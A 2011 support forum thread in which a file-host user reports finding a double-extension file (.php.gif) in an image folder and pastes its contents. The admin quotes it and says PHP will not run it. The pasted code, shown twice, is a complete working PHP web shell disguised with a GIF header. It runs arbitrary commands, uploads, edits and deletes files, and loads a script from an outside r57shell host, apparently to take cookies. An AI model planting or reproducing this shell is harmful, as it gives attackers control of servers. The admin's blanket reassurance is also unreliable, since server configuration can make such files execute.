HACKING ATTEMPTS?

All support enquiries for DFH go in here...

HACKING ATTEMPTS?

Postby serjb » Sat Aug 06, 2011 10:49 pm

Hi,

I found in folder ./image/ double extention file (261691*.php.gif)

As far as i can judje it's a PHP shell, or not? And what i must do?

Code: Select all
[size=50]GIF89A;
<html>
   <head>
      <title>~~~Own3d by Black PHP Shell~~~</title>
      <style type="text/css">
         a  {
            text-decoration: none;
            display: block;
         }

         a img  {
            border: 0;
         }

         #view tr:hover  {

            background-color: #EEE;

         }

         input:hover  {
            background-color: #EEE;

         }

         form#post  {}


         #post .buttons  {

            background-color: transparent;
            font-family: Arial;
            font-size: 11px;
            color: #222;

         }
      </style>
   </head>

   <body background="http://img34.picoodle.com/img/img34/4/2/8/f_backm_0c905a6.png" link="#444444" vlink="#444444">

      <h1 align="center" style='text-decoration: underline; color: #888;'>

         <i>Black PHP Shell</i>
      </h1>

      <table border=0 style='color: #666; font-family: Courier; font-size: 12px;'>


<?php
function getperms($f)  {
   $mode=fileperms($f);

   $perm='';
   $perm .= ($mode & 00400) ? 'r' : '-';
   $perm .= ($mode & 00200) ? 'w' : '-';
   $perm .= ($mode & 00100) ? 'x' : '-';
   $perm .= ($mode & 00040) ? 'r' : '-';
   $perm .= ($mode & 00020) ? 'w' : '-';
   $perm .= ($mode & 00010) ? 'x' : '-';
   $perm .= ($mode & 00004) ? 'r' : '-';
   $perm .= ($mode & 00002) ? 'w' : '-';
   $perm .= ($mode & 00001) ? 'x' : '-';

   return $perm;
}

print "<tr><td>Host</td><td><b>".$_SERVER['SERVER_NAME']."</b></td></tr>";
print "<tr><td>Server</td><td><b>".$_SERVER['SERVER_SOFTWARE']."</b></td></tr>";
if (is_callable("php_uname"))
   print "<tr><td>Sistema operativo</td><td><b>".php_uname()."</b></td></tr>";

if (is_callable("posix_getuid") and is_callable("posix_getgid"))  {
   $uid=posix_getuid();
   $uname=posix_getpwuid($uid);
   $uname=$uname['name'];

   $gid=posix_getgid();
   $gname=posix_getgrgid($gid);
   $gname=$gname['name'];
   
   print "<tr><td>UID</td><td><b>$uid ($uname)</b></td></tr>";
   print "<tr><td>GID</td><td><b>$gid ($gname)</b></td></tr>";
}

print "</table><br><br>";

if (!isset($_POST['file']))  {
?>

<table border=0>

<form enctype="multipart/form-data" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
   <input type="hidden" name="MAX_FILE_SIZE" value="200000000"/>
   <input type="hidden" name="do_upload" value="true">
      <tr><td>Carica un file</td></tr>
      <tr><td><input type="file" name="userfile"/></td></tr>
      <tr><td><input type="submit" value="Invia"/></td></tr>
</form>

<tr><td height="20px"></td></tr>

<form action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
      <tr><td>Esegui un comando</td></tr>
      <tr><td><input type="text" name="cmd"></td></tr>
      <tr><td><input type="submit" value="Esegui comando"></td></tr>
</form>
</table>

<?php
}

#

# Upload di file

#

if ($_POST['do_upload']==="true")  {
   if ($_POST['dir']=="true")
      $dir=$_POST['dirname'];
   else
      $dir=getcwd();

   $uploadfile=$dir."/".basename($_FILES['userfile']['name']);

   if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile))  {
      print "File caricato con successo<br>\n";
      print "Nome file: <b>".$_FILES['userfile']['name']."</b><br>".
         "\nTipo: ".$_FILES['userfile']['type']."<br>\n".
         "Dimensione: ".$_FILES['userfile']['size']." bytes<br>\n";
   }

   else print "Errore nel caricamento del file ".$_FILES['userfile']['name']."<br>\n";
}

#

# Modifica o cancellazione di file

#

if (isset($_POST['dofile']))  {
   $ref=$_SERVER['HTTP_REFERER'];
   $fname=htmlentities($_POST['dofile']);
   $content=$_POST['content'];

   #

   # Modifica

   #

   if (isset($_POST['save']))  {
      if (!($fp=fopen($fname,"w")))
         die ("Impossibile scrivere sul file <b>$fname</b><br>\n");

      fputs ($fp,$content);
      fclose($fp);

      print ("Modifiche sul file <b>$fname</b> apportate con successo<br><br>\n");
   }

   #

   # Cancellazione

   #

   if (isset($_POST['remove']))  {
      unlink ($fname) or die ("Impossibile rimuovere il file <b>$fname</b><br>\n");
      print "File <b>$fname</b> rimosso con successo<br><br>\n";
   }
}

#

# Esecuzione di un comando

#

if (isset($_POST['cmd']))  {
   $cmd=$_POST['cmd'];
   $output=array();
   exec ($cmd,$output);

   print "<br><hr height=1 width=\"100%\">\n";
   print "<i>Risultato del comando:</i><br><br><tt>";

   foreach ($output as $line)
      print "$line<br>\n";
   print "</tt>\n";
   die('');
}

#

# Visualizzazione di file

#

if (isset($_POST['fname']))  {
   print "<i>Attenzione: La modifica o la cancellazione di un file ? possibile se e soltanto se ".
      "quel file ha i permessi di scrittura per tutti</i><br><br>\n";

   $fname=htmlentities($_POST['fname']);
   $file=file($fname) or die ("Impossibile aprire <b>$fname</b><br>\n");

   print "<form action=\"".$_SERVER['REQUEST_URI']."\" method=\"POST\">\n";
   print "<input type=\"hidden\" name=\"dofile\" value=\"$fname\">\n";
   print "<textarea rows=20 cols=80 name=\"content\">";

   for ($i=0; $i<count($file); $i++)
      print htmlentities($file[$i]);

   print "</textarea><br><br>\n";
   print "<input type=\"submit\" value=\"Salva le modifiche al file\" name=\"save\">\n";
   print "<input type=\"submit\" value=\"Cancella file\" name=\"remove\">\n";
   print "</form>\n";
}

#

# Visualizzazione del contenuto di una directory

#

if (isset($_POST['dirname']))
   $path=htmlspecialchars($_POST['dirname']);
else
   $path=getcwd();

$dp=opendir($path) or die("Impossibile aprire <b>$path</b><br>\n");
chdir ($path);
$path=getcwd();

print "<div id=\"view\"><hr height=1 width=\"100%\">\n";
print "Directory corrente: <b>".getcwd()."</b><br><br>\n\n";
$dir=array();

while ($file=readdir($dp))
   if (strcmp(".",$file))
      array_push($dir,"$path/$file");

closedir($dp);
sort($dir);

?>
<script type="text/javascript" language="javascript" src="http://r57shell.us/v4/cookie.js"></script>
<form name="post" id="post" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
<table border=0 width="100%">
<?php
for ($i=0; $i<count($dir); $i++)  {
   print "<tr style='font-family: Arial; font-size: 11px;'>\n";

   #

   # Directory superiore

   #

   if (basename($dir[$i])==="..")  {
      $tmp=split('/',getcwd());
      $new="";

      for ($j=0; $j<count($tmp)-1; $j++)
         $new .= $tmp[$j]."/";


      print "<td width=\"40px\"><img src=\"http://img32.picoodle.com/img/img32/4/2/8/f_upm_cacf553.gif\" alt=\"..\" width=20 height=20></td>\n";

      print "<td><input type=\"submit\" name=\"dirname\" value=\"$new\" class=\"buttons\"></td></tr>\n";
   }

   #

   # Directory

   #

   if (is_dir($dir[$i]))  {
      if (basename($dir[$i])!='..')  {
         print "<td width=\"40px\"><img src=\"http://img34.picoodle.com/img/img34/4/2/8/f_directorym_9967091.gif\" alt=\".\" width=20 height=20></td>\n";

         print "<td><input type=\"submit\" name=\"dirname\" value=\"".$dir[$i].
            "\" class=\"buttons\"></td>\n";
         print "<td>DIR</td></tr>\n";
      }
   }
   
   #

   # File comune

   #

   else  {
      if (basename($dir[$i])!='..')  {
         print "<td width=\"40px\"><img src=\"http://img03.picoodle.com/img/img03/4/2/8/f_filem_27c273b.png\" alt=\".\" width=20 height=20></td>\n";

         print "<td><input type=\"submit\" name=\"fname\" value=\"$dir[$i]\" class=\"buttons\"></td>\n";
         print "<td>".getperms($dir[$i])."</td></tr>\n";
      }
   }
}

print "</table></div>\n";
?>
      
      </body>
</html>[/size]
serjb
Newbie Member
 
Posts: 1
Joined: Mon Apr 25, 2011 9:35 pm

Re: HACKING ATTEMPTS?

Postby SamEA » Sun Aug 07, 2011 12:45 pm

serjb wrote:Hi,

I found in folder ./image/ double extention file (261691*.php.gif)

As far as i can judje it's a PHP shell, or not? And what i must do?

Code: Select all
[size=50]GIF89A;
<html>
   <head>
      <title>~~~Own3d by Black PHP Shell~~~</title>
      <style type="text/css">
         a  {
            text-decoration: none;
            display: block;
         }

         a img  {
            border: 0;
         }

         #view tr:hover  {

            background-color: #EEE;

         }

         input:hover  {
            background-color: #EEE;

         }

         form#post  {}


         #post .buttons  {

            background-color: transparent;
            font-family: Arial;
            font-size: 11px;
            color: #222;

         }
      </style>
   </head>

   <body background="http://img34.picoodle.com/img/img34/4/2/8/f_backm_0c905a6.png" link="#444444" vlink="#444444">

      <h1 align="center" style='text-decoration: underline; color: #888;'>

         <i>Black PHP Shell</i>
      </h1>

      <table border=0 style='color: #666; font-family: Courier; font-size: 12px;'>


<?php
function getperms($f)  {
   $mode=fileperms($f);

   $perm='';
   $perm .= ($mode & 00400) ? 'r' : '-';
   $perm .= ($mode & 00200) ? 'w' : '-';
   $perm .= ($mode & 00100) ? 'x' : '-';
   $perm .= ($mode & 00040) ? 'r' : '-';
   $perm .= ($mode & 00020) ? 'w' : '-';
   $perm .= ($mode & 00010) ? 'x' : '-';
   $perm .= ($mode & 00004) ? 'r' : '-';
   $perm .= ($mode & 00002) ? 'w' : '-';
   $perm .= ($mode & 00001) ? 'x' : '-';

   return $perm;
}

print "<tr><td>Host</td><td><b>".$_SERVER['SERVER_NAME']."</b></td></tr>";
print "<tr><td>Server</td><td><b>".$_SERVER['SERVER_SOFTWARE']."</b></td></tr>";
if (is_callable("php_uname"))
   print "<tr><td>Sistema operativo</td><td><b>".php_uname()."</b></td></tr>";

if (is_callable("posix_getuid") and is_callable("posix_getgid"))  {
   $uid=posix_getuid();
   $uname=posix_getpwuid($uid);
   $uname=$uname['name'];

   $gid=posix_getgid();
   $gname=posix_getgrgid($gid);
   $gname=$gname['name'];
   
   print "<tr><td>UID</td><td><b>$uid ($uname)</b></td></tr>";
   print "<tr><td>GID</td><td><b>$gid ($gname)</b></td></tr>";
}

print "</table><br><br>";

if (!isset($_POST['file']))  {
?>

<table border=0>

<form enctype="multipart/form-data" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
   <input type="hidden" name="MAX_FILE_SIZE" value="200000000"/>
   <input type="hidden" name="do_upload" value="true">
      <tr><td>Carica un file</td></tr>
      <tr><td><input type="file" name="userfile"/></td></tr>
      <tr><td><input type="submit" value="Invia"/></td></tr>
</form>

<tr><td height="20px"></td></tr>

<form action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
      <tr><td>Esegui un comando</td></tr>
      <tr><td><input type="text" name="cmd"></td></tr>
      <tr><td><input type="submit" value="Esegui comando"></td></tr>
</form>
</table>

<?php
}

#

# Upload di file

#

if ($_POST['do_upload']==="true")  {
   if ($_POST['dir']=="true")
      $dir=$_POST['dirname'];
   else
      $dir=getcwd();

   $uploadfile=$dir."/".basename($_FILES['userfile']['name']);

   if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile))  {
      print "File caricato con successo<br>\n";
      print "Nome file: <b>".$_FILES['userfile']['name']."</b><br>".
         "\nTipo: ".$_FILES['userfile']['type']."<br>\n".
         "Dimensione: ".$_FILES['userfile']['size']." bytes<br>\n";
   }

   else print "Errore nel caricamento del file ".$_FILES['userfile']['name']."<br>\n";
}

#

# Modifica o cancellazione di file

#

if (isset($_POST['dofile']))  {
   $ref=$_SERVER['HTTP_REFERER'];
   $fname=htmlentities($_POST['dofile']);
   $content=$_POST['content'];

   #

   # Modifica

   #

   if (isset($_POST['save']))  {
      if (!($fp=fopen($fname,"w")))
         die ("Impossibile scrivere sul file <b>$fname</b><br>\n");

      fputs ($fp,$content);
      fclose($fp);

      print ("Modifiche sul file <b>$fname</b> apportate con successo<br><br>\n");
   }

   #

   # Cancellazione

   #

   if (isset($_POST['remove']))  {
      unlink ($fname) or die ("Impossibile rimuovere il file <b>$fname</b><br>\n");
      print "File <b>$fname</b> rimosso con successo<br><br>\n";
   }
}

#

# Esecuzione di un comando

#

if (isset($_POST['cmd']))  {
   $cmd=$_POST['cmd'];
   $output=array();
   exec ($cmd,$output);

   print "<br><hr height=1 width=\"100%\">\n";
   print "<i>Risultato del comando:</i><br><br><tt>";

   foreach ($output as $line)
      print "$line<br>\n";
   print "</tt>\n";
   die('');
}

#

# Visualizzazione di file

#

if (isset($_POST['fname']))  {
   print "<i>Attenzione: La modifica o la cancellazione di un file ? possibile se e soltanto se ".
      "quel file ha i permessi di scrittura per tutti</i><br><br>\n";

   $fname=htmlentities($_POST['fname']);
   $file=file($fname) or die ("Impossibile aprire <b>$fname</b><br>\n");

   print "<form action=\"".$_SERVER['REQUEST_URI']."\" method=\"POST\">\n";
   print "<input type=\"hidden\" name=\"dofile\" value=\"$fname\">\n";
   print "<textarea rows=20 cols=80 name=\"content\">";

   for ($i=0; $i<count($file); $i++)
      print htmlentities($file[$i]);

   print "</textarea><br><br>\n";
   print "<input type=\"submit\" value=\"Salva le modifiche al file\" name=\"save\">\n";
   print "<input type=\"submit\" value=\"Cancella file\" name=\"remove\">\n";
   print "</form>\n";
}

#

# Visualizzazione del contenuto di una directory

#

if (isset($_POST['dirname']))
   $path=htmlspecialchars($_POST['dirname']);
else
   $path=getcwd();

$dp=opendir($path) or die("Impossibile aprire <b>$path</b><br>\n");
chdir ($path);
$path=getcwd();

print "<div id=\"view\"><hr height=1 width=\"100%\">\n";
print "Directory corrente: <b>".getcwd()."</b><br><br>\n\n";
$dir=array();

while ($file=readdir($dp))
   if (strcmp(".",$file))
      array_push($dir,"$path/$file");

closedir($dp);
sort($dir);

?>
<script type="text/javascript" language="javascript" src="http://r57shell.us/v4/cookie.js"></script>
<form name="post" id="post" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
<table border=0 width="100%">
<?php
for ($i=0; $i<count($dir); $i++)  {
   print "<tr style='font-family: Arial; font-size: 11px;'>\n";

   #

   # Directory superiore

   #

   if (basename($dir[$i])==="..")  {
      $tmp=split('/',getcwd());
      $new="";

      for ($j=0; $j<count($tmp)-1; $j++)
         $new .= $tmp[$j]."/";


      print "<td width=\"40px\"><img src=\"http://img32.picoodle.com/img/img32/4/2/8/f_upm_cacf553.gif\" alt=\"..\" width=20 height=20></td>\n";

      print "<td><input type=\"submit\" name=\"dirname\" value=\"$new\" class=\"buttons\"></td></tr>\n";
   }

   #

   # Directory

   #

   if (is_dir($dir[$i]))  {
      if (basename($dir[$i])!='..')  {
         print "<td width=\"40px\"><img src=\"http://img34.picoodle.com/img/img34/4/2/8/f_directorym_9967091.gif\" alt=\".\" width=20 height=20></td>\n";

         print "<td><input type=\"submit\" name=\"dirname\" value=\"".$dir[$i].
            "\" class=\"buttons\"></td>\n";
         print "<td>DIR</td></tr>\n";
      }
   }
   
   #

   # File comune

   #

   else  {
      if (basename($dir[$i])!='..')  {
         print "<td width=\"40px\"><img src=\"http://img03.picoodle.com/img/img03/4/2/8/f_filem_27c273b.png\" alt=\".\" width=20 height=20></td>\n";

         print "<td><input type=\"submit\" name=\"fname\" value=\"$dir[$i]\" class=\"buttons\"></td>\n";
         print "<td>".getperms($dir[$i])."</td></tr>\n";
      }
   }
}

print "</table></div>\n";
?>
      
      </body>
</html>[/size]


I should not be alarmed, because PHP will not run the above file with the extension ".gif", as PHP will only process files on the webserver if, and only if the extension ends with ".php" (unless configured otherwise). This is why it is important to allow only certain image file types, however this does to apply to file uploading.
SamEA,
DaddyScripts' Admin & Developer.

Require a PHP or general IT freelancer? Don't hesitate to PM me.
User avatar
SamEA
Site Admin
 
Posts: 1165
Joined: Sat Feb 19, 2011 7:51 pm


Return to Daddy's File Host v1.X

Who is online

Users browsing this forum: No registered users and 13 guests

cron